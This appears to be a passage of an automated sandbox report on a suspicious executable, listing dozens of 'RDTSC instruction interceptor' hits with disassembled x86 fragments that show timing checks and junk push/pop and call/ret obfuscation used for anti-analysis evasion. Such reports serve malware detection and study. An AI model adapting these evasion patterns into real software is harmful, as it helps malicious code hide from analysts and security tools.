                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBA5A second address: 5EBA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F865D1C554Ch 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBA70 second address: 5EBA77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBB09 second address: 5EBB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBB0F second address: 5EBB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBB18 second address: 5EBB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC519 second address: 5EC523 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED02E second address: 5ED034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED034 second address: 5ED08C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D2C60h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F865CD192D8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1967h], ebx 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECDDE second address: 5ECDF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F865D1C5546h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F865D1C554Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED952 second address: 5ED95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F865CD192D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDB8D second address: 5EDB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDB92 second address: 5EDBA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192DEh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDBA4 second address: 5EDC22 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F865D1C5546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1959h], edx 0x00000015 mov si, di 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F865D1C5548h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F865D1C5548h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 or dword ptr [ebp+122D2FDEh], edx 0x00000056 xchg eax, ebx 0x00000057 jmp 00007F865D1C5555h 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F22A6 second address: 5F22AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3F71 second address: 5F3FA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F865D1C5556h 0x00000010 jo 00007F865D1C554Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3FA4 second address: 5F3FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jg 00007F865CD192DCh 0x0000000c sub dword ptr [ebp+1247F94Ch], edi 0x00000012 sub dword ptr [ebp+122D2E74h], edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F865CD192D8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov bx, 4098h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b mov edi, dword ptr [ebp+122D26C9h] 0x00000041 pop ebx 0x00000042 push eax 0x00000043 push ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3FEE second address: 5F3FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3FF2 second address: 5F3FF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F606B second address: 5F607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F865D1C5546h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F865D1C5546h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F71EE second address: 5F71F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6260 second address: 5F6265 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6265 second address: 5F6288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F865CD192E9h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F94F1 second address: 5F94F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F94F7 second address: 5F94FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F832E second address: 5F8332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8332 second address: 5F8338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8338 second address: 5F8361 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F865D1C554Ch 0x00000008 jnl 00007F865D1C5546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push edi 0x00000013 jmp 00007F865D1C5550h 0x00000018 pop edi 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB4BE second address: 5FB4E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F865CD192E2h 0x00000008 ja 00007F865CD192D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC439 second address: 5FC43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC43D second address: 5FC443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC443 second address: 5FC449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC449 second address: 5FC463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F865CD192DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD4E2 second address: 5FD4E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD4E6 second address: 5FD56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F865CD192D8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007F865CD192D8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 jns 00007F865CD192D9h 0x00000046 or dword ptr [ebp+122D2EEAh], ecx 0x0000004c call 00007F865CD192E6h 0x00000051 mov di, E363h 0x00000055 pop edi 0x00000056 push 00000000h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c jne 00007F865CD192D6h 0x00000062 pop eax 0x00000063 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE62C second address: 5FE682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D283Ch] 0x0000000d jmp 00007F865D1C5552h 0x00000012 push 00000000h 0x00000014 mov ebx, dword ptr [ebp+12480C46h] 0x0000001a mov edi, 36A24E91h 0x0000001f push 00000000h 0x00000021 mov ebx, dword ptr [ebp+122D2CD6h] 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 pushad 0x0000002a jmp 00007F865D1C5559h 0x0000002f push esi 0x00000030 pop esi 0x00000031 popad 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE682 second address: 5FE6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F865CD192E3h 0x0000000f pop edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE6A0 second address: 5FE6A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FA669 second address: 5FA66E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD6F6 second address: 5FD72C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F865D1C5554h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 ja 00007F865D1C5546h 0x00000016 jmp 00007F865D1C5550h 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD72C second address: 5FD732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6006D6 second address: 6006F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F865D1C5546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F865D1C5557h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD810 second address: 5FD816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6006F7 second address: 600701 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F865D1C554Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600D66 second address: 600D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602F63 second address: 602F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F865D1C5546h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3548 second address: 5A3553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3553 second address: 5A355F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F865D1C5546h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A355F second address: 5A3584 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3584 second address: 5A3588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3588 second address: 5A358E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A358E second address: 5A3594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3594 second address: 5A35A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DDh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A35A6 second address: 5A35AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B47C second address: 60B490 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jl 00007F865CD192D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F865CD192D8h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B490 second address: 60B497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FD17 second address: 60FD28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192DDh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617234 second address: 617244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F865D1C5546h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616639 second address: 61663D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61663D second address: 61664D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F865D1C5546h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61664D second address: 616659 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616659 second address: 61665E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61665E second address: 616666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616801 second address: 616805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616805 second address: 61680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61680B second address: 616811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616811 second address: 616825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 js 00007F865CD192D6h 0x0000000b pop eax 0x0000000c ja 00007F865CD192DEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616D72 second address: 616D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865D1C5556h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616D8C second address: 616D96 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170C0 second address: 6170C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170C6 second address: 6170CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170CC second address: 6170DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Dh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B83A second address: 61B860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F865CD192E2h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B860 second address: 61B877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C5553h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C67A second address: 61C689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192DBh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C689 second address: 61C6A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F865D1C554Eh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620FB3 second address: 620FC8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007F865CD192D6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push edx 0x0000000d jno 00007F865CD192D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621507 second address: 62150C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621686 second address: 6216EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F865CD192E2h 0x0000000f jl 00007F865CD192D6h 0x00000015 je 00007F865CD192D6h 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e jng 00007F865CD192D6h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jp 00007F865CD192D6h 0x0000002c jnp 00007F865CD192D6h 0x00000032 popad 0x00000033 jmp 00007F865CD192E7h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F865CD192DFh 0x0000003f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62182C second address: 621832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621832 second address: 621863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F865CD192E9h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007F865CD192D6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F865CD192D6h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF194 second address: 5CF198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679113 second address: 679117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679117 second address: 679125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F865CD192DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679125 second address: 679129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679129 second address: 679132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679132 second address: 67914C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007F865D1C5546h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67914C second address: 67915E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F865CD192DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688A95 second address: 688A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
